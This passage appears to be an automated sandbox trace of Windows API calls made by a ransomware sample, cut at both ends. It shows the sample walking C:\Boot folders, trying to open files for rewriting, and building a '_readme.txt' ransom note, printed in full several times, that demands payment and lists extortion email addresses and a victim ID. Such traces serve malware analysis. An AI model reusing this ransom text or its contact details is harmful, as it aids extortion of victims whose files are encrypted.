ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0227.934] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed850 | out: hHeap=0x630000) returned 1 [0227.935] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0227.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed850 [0227.935] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.936] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.936] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.936] PathFindFileNameW (pszPath="C:\\Boot\\es-ES\\") returned="es-ES\\" [0227.936] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.936] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.936] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.936] PathFindFileNameW (pszPath="") returned="" [0227.936] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.937] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.937] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.937] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.937] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.937] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.937] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.937] PathAppendW (in: pszPath="C:\\Boot\\es-ES\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 1 [0227.937] PathFileExistsW (pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 0 [0227.937] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.937] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.938] CreateFileW (lpFileName="C:\\Boot\\es-ES\\_readme.txt" (normalized: "c:\\boot\\es-es\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.938] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0227.938] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.938] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.938] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.938] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.938] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.938] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0227.938] PathFindExtensionW (pszPath="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned=".mui" [0227.938] CreateFileW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.938] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7388 | out: hHeap=0x630000) returned 1 [0227.939] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0227.939] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed850 | out: hHeap=0x630000) returned 1 [0227.939] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0227.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed850 [0227.939] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.943] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.943] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.944] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.944] RtlAllocateHeap (HeapHandle=0x630000, 